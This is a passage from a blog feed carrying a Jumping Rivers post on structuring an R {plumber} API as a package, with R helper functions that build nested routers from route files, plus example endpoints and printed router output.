&lt;/p&gt;</description></item><item><title>API as a package: Structure</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-structure/</link><pubDate>Thu, 15 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-structure/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-structure/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-structure/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: API as a package: Structure (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-logging/" rel="external"&gt;Part 2: API as a package:
Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-testing/" rel="external"&gt;Part 3: API as a package:
Testing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers we were recently tasked with taking a prototype
application built in {shiny} to a public facing production environment
for a public sector organisation. During the scoping exercise it was
determined that a more appropriate solution to fit the requirements was
to build the application with a {plumber} API providing the interface to
the Bayesian network model and other application tools written in R.&lt;/p&gt;
&lt;p&gt;When building applications in {shiny} we have for some time been using
the “app as a package” approach which has been popularised by tools like
{golem} and {leprechaun}, in large part due to the convenience that
comes with leveraging the testing and dependency structure that our R
developers are comfortable with in authoring packages, and the ease with
which one can install and run an application in a new environment as a
result. For this project we looked to take some of these ideas to a
{plumber} application. This blog post discusses some of the thoughts and
resultant structure that came as a result of that process.&lt;/p&gt;
&lt;p&gt;As I began to flesh out this blog post I realised that it was becoming
very long, and there were a number of different aspects that I wanted to
discuss: structure, logging and testing to name a few. To try to keep
this a bit more palatable I will instead do a mini-series of blog posts
around the API as a package idea and focus predominantly on the
structure elements here.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-structure"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="api-as-a-package"&gt;API as a package&lt;/h2&gt;
&lt;p&gt;There are a few things I really like about the {shiny} app as a package
approach that I wanted to reflect in the design and build of a {plumber}
application as package.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It encourages a regular structure and organisation for an
application. All modules have a consistent naming pattern and
structure.&lt;/li&gt;
&lt;li&gt;It encourages leveraging the {testthat} package and including some
common tests across a series of applications, see
&lt;code&gt;golem::use_reccommended_tests()&lt;/code&gt; for example.&lt;/li&gt;
&lt;li&gt;An instance of the app can be created via a single function call
which does all the necessary set up, say &lt;code&gt;my_package::run_app()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Primarily I wanted these features, which could be reused across
{plumber} applications that we create both internally and for our
clients. As far as I know there isn’t a similar package that provides an
opinionated way of laying out a {plumber} application as a package, and
it is my intention to create one as a follow up to this work.&lt;/p&gt;
&lt;h3 id="regular-structure"&gt;Regular structure&lt;/h3&gt;
&lt;p&gt;When developing the solution for this particular project I did have in
the back of my mind that I wanted to create as much reusable structure
for any future projects of this sort as possible. I really wanted to
have an easy way to, from a package structure, be able to build out an
API with nested routes, using code that could easily transfer to another
package.&lt;/p&gt;
&lt;p&gt;I opted for a structure that utilised the &lt;code&gt;inst/extdata/api/routes&lt;/code&gt;
directory of a package as a basis with the idea that the following file
structure&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;| inst/extdata/api/routes/
|
| - model.R
| - reports/
- |
| - pdf.R
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with example route definitions inside&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# model.R
#* @post /prediction
exported_function_from_my_package
# pdf.R
#* @post /weekly
exported_function_from_my_package
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would translate to an API with the following endpoints&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;host&gt;/model/prediction&lt;/li&gt;
&lt;li&gt;&lt;host&gt;/reports/pdf/weekly&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A few simple function definitions would allow us to do this for any
given package that uses this file structure.&lt;/p&gt;
&lt;p&gt;The first function here just grabs the directory from the current
package where I will define the endpoints that make up my API.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_internal_routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.file&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;extdata&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;api&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;routes&amp;#34;&lt;/span&gt;, path,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; utils&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageName&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mustWork &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;create_routes&lt;/code&gt; will recursively list out all of the .R files within the
chosen directory and name them according to the name of the file, this
will make it easy to build out a a number of “nested” routers that will
all be mounted into the same API, achieving the compartmentalisation
that we desire. For example the two files at
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes/model.R&lt;/code&gt; and
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes/reports/pdf.R&lt;/code&gt; will take on the
names &lt;code&gt;&amp;quot;model&amp;quot;&lt;/code&gt; and &lt;code&gt;&amp;quot;reports/pdf&amp;quot;&lt;/code&gt; respectively.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_default_route_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(routes, dir) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(routes, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(names, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.R$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(routes) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; names
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(dir) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;*\\.R$&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_default_route_names&lt;/span&gt;(routes, dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The final few pieces to the puzzle ensure that we have &lt;code&gt;/&lt;/code&gt; at the
beginning of a string (&lt;code&gt;ensure_slash()&lt;/code&gt;), for the purpose of mounting
components to my router. &lt;code&gt;add_plumber_definition()&lt;/code&gt; just calls the
necessary functions from {plumber} to process a new route file, i.e from
the decorated functions in the file create the routes, and then mount
them at a given path to an existing router object. For example given a
file “test.R” that has a &lt;code&gt;#* @get /identity&lt;/code&gt; decorator against a
function definition and &lt;code&gt;endpoint = &amp;quot;test&amp;quot;&lt;/code&gt; we would add
&lt;code&gt;/test/identity&lt;/code&gt; to the existing router. &lt;code&gt;generate_api()&lt;/code&gt; takes a full
named vector/list of file paths, ensures they all have an appropriate
name and mounts them all to a new &lt;code&gt;Plumber&lt;/code&gt; router object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ensure_slash &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(string) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; has_slash &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^/&amp;#34;&lt;/span&gt;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (has_slash) string &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_plumber_definition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pr, endpoint, file, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; router &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; file, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_mount&lt;/span&gt;(pr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pr,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; endpoint,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; router &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; router
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;generate_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(routes, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; endpoints &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_chr&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(routes), ensure_slash)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reduce2&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; endpoints, .y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; routes,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; add_plumber_definition, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .init &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With these defined I can then, as I develop my package, add new routes
by defining functions and adding {plumber} tag annotations to files in
&lt;code&gt;/inst/&lt;/code&gt; and rebuild the new API with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and nothing about this code is specific to my current package so is
transferable. As a concrete, but very much simplified example, I might
have the following collection of files/annotations under
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Taken from plumber quickstart documentation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://www.rplumber.io/articles/quickstart.html&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /test.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /is_alive&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(alive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /nested/example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Taken from plumber quickstart documentation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://www.rplumber.io/articles/quickstart.html&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which would give me&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Plumber router with 0 endpoints, 4 filters, and 3 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Use `pr_run()` on this object to start the API.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/example&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ └──/echo (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/nested&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──/example&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ └──/echo (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[cookieParser]&lt;/span&gt;
